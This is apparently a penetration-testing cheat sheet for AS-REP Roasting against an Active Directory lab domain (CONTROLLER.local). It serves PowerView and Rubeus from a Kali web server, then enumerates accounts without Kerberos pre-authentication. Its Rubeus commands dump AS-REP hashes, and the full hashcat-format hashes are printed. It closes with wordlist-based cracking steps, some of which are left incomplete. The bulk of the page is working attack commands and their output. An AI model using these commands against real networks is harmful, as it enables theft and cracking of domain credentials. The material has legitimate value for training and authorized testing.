ASREPRoasting
from Windows with Rubeus.exe & PowerView.ps1
🔨 Expose PowerView on kali machine
on kali
mkdir -p /home/kali/workspace/www && cd /home/kali/workspace/www
cp /opt/windows/PowerSploit/Recon/PowerView.ps1 .
python3 -m http.server 80
🔨 Download PowerView.ps1
option 1 - on windows [cmd]
option 2 - on windows [powershell]🔨 Expose Rubeus.exe on kali machine
mkdir -p /home/kali/workspace/www && cd /home/kali/workspace/www
cp /opt/windows/GhostpackBinaries/Rubeus.exe .
python3 -m http.server 80
🔨 Download Rubeus.exe
[powershell]
🔨 Enumerating accounts with DONT_REQ_PREAUTH
PowerView based tool used to search for the DONT_REQ_PREAUTH
value across in user accounts in a target Windows domain. Performed from a Windows-based host.
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
|->
samaccountname : Admin2
userprincipalname : Admin2@CONTROLLER.local
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
samaccountname : User3
userprincipalname : User3@CONTROLLER.local
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
🔨 (op.1) Target a Specific User
Uses Rubeus to perform an ASEP Roasting attack and formats the output for Hashcat. Performed from a Windows-based host.
.\Rubeus.exe asreproast /user:Admin2 /nowrap /format:hashcat
|->
$krb5asrep$23$Admin2@CONTROLLER.local:FF90B94EB0168D4D06574D3A2B8787BA$EB84FCB07
9C0A28C5AD6172029DD0F57C38FBF5882515FDFBA528CA1C87175597147F1B3871828ECE0CD7403B40813F
BEF9161128C5D494B81DB9800E7CD27C0CB894D081168FD706F5E041A82E1342A71CB13F5C11188F078782
8B28525DB933AE450782296AAF9D2702E74519DA9EAF67D95F1B77E92D8A15F3F2FDC65854746BBD799FC9
BDCE066A3C232F02C04187CFBBA677E19DF267F6656BAA5A66B2F9DC8A18685824892582A708BB3A3D8DD0
0E5977EC4886D1F02886679F05F7C621D1769F7D76357209D29A6CF46A4701057BAD2A6C310E8C9856F6BA
116063A1470343F1B5CC997084C77C7DCB0FEB6987DB053E0
.\Rubeus.exe asreproast /user:User3 /nowrap /format:hashcat
|->
$krb5asrep$23$User3@CONTROLLER.local:DFB1482580F1EC36315B90F76D7EA0EA$4753CCE65B
F1CB613D99D92B682AD0BE9917631E25403C88C84E9363536963611CBD7B800E57423B052C10C86BEE810E
953DD0E7E8C98268ACC3FEB91CBB14744A2CA65F5B5E0B730ADBD5755281D3D7EFFB5700DAEAF080205B5E
BD7458C94997E7192A78A968A5458C11D37966B5E600FF2C8D86344567C6FEE14856FCF9060EED29992472
451501E632A1A02A36723FF21C9741FA63312D8913EDE500C49B2D650E4FE36FB1377E18F25C5FF0C51FA8
8CCDD524C60195D03770FEDD81E2494E891A252F290DD20E0513D711EE2A1B1B0FFE1E9F7ACF6E614D1134
C444B6D8E70FF35F63F41DDE45E201557C80C030B55FDBD0
🔨 (op.2) Target all Users
🔨 Cracking the Hash with Hashcat
Uses Hashcat to attempt to crack the captured hash using a wordlist (rockyou.txt). Performed from a Linux-based host.
- pass.txt - /usr/share/wordlists/rockyou.txt
- pass.txt -
wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt -O pass.txt